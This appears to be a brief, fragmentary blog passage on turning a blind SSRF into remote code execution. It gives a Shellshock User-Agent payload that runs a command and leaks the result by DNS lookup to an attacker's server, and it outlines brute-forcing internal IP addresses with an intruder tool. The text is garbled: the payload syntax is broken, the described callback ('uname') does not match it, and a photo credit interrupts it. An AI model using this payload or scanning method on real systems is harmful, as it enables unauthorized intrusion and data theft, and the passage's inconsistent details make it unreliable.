Escalating Blind SSRF to a Remote Code Execution

Escalating Blind SSRF to a Remote Code Execution

User-Agent: () {:;}; /usr/bin/nslookup $(.whoami).myserver.com (It’s used to exploit shellshock vulnerability)

Referer: https://target.com/

uname.myserver.com will be sent to myserver.

If it doesn’t show a response to the request then we can come to the conclusion that the particular target is not vulnerable.

Photo by hmm 001 on Unsplash

In order to find the other internal networks take one internal IP address send that to an intruder and start positioning the last octet of the IP address then the payload type “number”. The payload step is 1 and then start the attack.